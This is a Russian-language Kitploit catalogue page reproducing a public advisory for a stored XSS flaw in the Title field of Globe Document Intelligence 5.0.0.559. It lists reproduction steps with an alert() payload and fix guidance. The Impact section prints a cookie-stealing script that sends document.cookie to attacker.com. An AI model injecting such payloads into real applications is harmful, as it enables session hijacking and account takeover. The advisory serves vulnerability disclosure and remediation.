Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-65640 — Публичное уведомление о CVE-2025-65640: хранимая XSS-уязвимость в Globe Document Intelligence. | Kitploit
Инструменты/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
Анализ уязвимостейЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

Публичное уведомление о CVE-2025-65640: хранимая XSS-уязвимость в Globe Document Intelligence.

Репозиторий
1013 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-65640

1. Информация об уязвимости

  • CVE ID: CVE-2025-65640 (В настоящее время RESERVED)
  • Тип уязвимости: Межсайтовый скриптинг с сохранением (Stored Cross-Site Scripting, XSS)
  • Оценка CVSSv3: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • Поставщик: Arket/Bluenext S.r.l.
  • Продукт: Globe Document Intelligence
  • Затронутая версия: 5.0.0.559
  • Исследователь: Vincenzo Emanuele Martone

2. Описание

В платформе Globe Document Intelligence (версия 5.0.0.559) выявлена уязвимость типа «межсайтовый скриптинг с сохранением» (Stored Cross-Site Scripting, XSS). Приложение не выполняет надлежащую санитизацию или кодирование пользовательского ввода в свойстве «Title» создаваемого документа. Когда аутентифицированный пользователь переходит на страницы сводки (например, «Task in progress / Recent»), вредоносная полезная нагрузка отражается и выполняется в контексте браузера жертвы.

3. Воздействие

Данная уязвимость позволяет аутентифицированному злоумышленнику сохранить вредоносный JavaScript-код на сервере. Когда другие аутентифицированные пользователи (включая учётные записи администраторов) просматривают затронутые страницы, скрипт выполняется автоматически. Хотя приведённый ниже Proof of Concept демонстрирует уязвимость с помощью безобидного alert(), злоумышленник может использовать этот недостаток для перехвата сеанса (Session Hijacking) и захвата учётной записи (Account Takeover). Например, внедрение полезной нагрузки вида позволит незаметно похитить сеансовые cookie жертвы на внешний сервер, контролируемый злоумышленником.

<script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script>

4. Шаги воспроизведения (Proof of Concept)

Чтобы воспроизвести уязвимость, аутентифицированному злоумышленнику необходимо выполнить следующие шаги:

  1. Перейти в раздел создания документа («Nuovo documento») и заполнить обязательные поля произвольными данными, чтобы успешно создать новый документ.
  2. Отправить форму и создать документ.
  3. Выбрать созданный документ, открыть контекстное меню (правая кнопка мыши -> Document Properties) и найти поле «Title».
  4. Внедрить в поле «Title» следующую базовую XSS-полезную нагрузку: <script>alert("XSS")</script>
  5. Сохранить изменения. Вредоносная полезная нагрузка теперь постоянно хранится в базе данных.
  6. Перейти на страницу «Task in progress / Recent» (Task in attesa/Recenti).
  7. Поскольку страница отображает заголовок документа без надлежащего кодирования вывода, JavaScript-полезная нагрузка выполняется и вызывает alert.

5. Рекомендуемые меры устранения

По информации поставщика, данная уязвимость устранена в версии 5.1.0.575. Для устранения проблемы рекомендуется обновить платформу Globe Document Intelligence до версии 5.1.0.575.


Отказ от ответственности

Данный Proof of Concept (PoC) предоставлен исключительно в образовательных и исследовательских целях. Информация и код, описанные в этом документе, не должны использоваться во вредоносных целях или против любых систем без явного предварительного разрешения владельцев систем. Автор не несёт ответственности и не отвечает за неправомерное использование или ущерб, причинённый в результате применения предоставленных материалов.

Скачать инструмент